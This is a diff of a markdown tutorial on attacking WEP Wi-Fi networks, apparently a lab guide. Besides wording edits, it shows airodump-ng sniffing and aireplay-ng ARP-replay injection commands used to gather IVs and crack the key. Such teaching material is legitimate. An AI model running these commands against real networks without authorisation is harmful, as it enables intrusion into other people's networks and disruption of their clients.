--- a/1.wep_attack_flow.md
+++ b/1.wep_attack_flow.md
@@ -44,7 +44,8 @@ So, let's run again airodump-ng targeting just the channel for the WEP Network.
 ⚠️ sudo airodump-ng -c ${channel} wlan0mon
 ```
 Note: It can take a while before a station connects. 
-Once you have it grab the CHANNEL, BSSID, ESSID, and the CLIENT we want to focus on in the attack step.
+
+Once you have it, grab **CHANNEL, BSSID, ESSID, and the CLIENT** we want to focus on in the attack step.
 
 ```bash
 ⚠️ channel=3
@@ -73,7 +74,7 @@ Once the ARP request is captured, tools like `aireplay-ng -3` can replay it repe
 
 This allows you to accumulate enough IVs quickly for aircrack-ng to recover the WEP key via statistical analysis.
 
-In a new terminal tab let's start sniffing specifically on AP ‘wifi-corp’ and dump the output in a capture file.
+In terminal 1 tab let's start sniffing specifically on AP ‘wifi-corp’ and dump the output in a capture file.
 
 ```bash
 ⚠️ mkdir WEP
@@ -111,10 +112,6 @@ When you see **Association Succesfull :-)** press CTRL+C to stop the De-Auth pro
 In the same terminal generate traffic in order to find duplicate IV’s
 
 ```bash
-⚠️ bssid='F0:9F:C2:71:22:11'
-⚠️ essid='wifi-old'
-⚠️ client='3E:C8:44:0A:24:BA'
-
 ⚠️ sudo aireplay-ng -3 -b ${bssid} -h ${client} wlan0mon
 ```
 
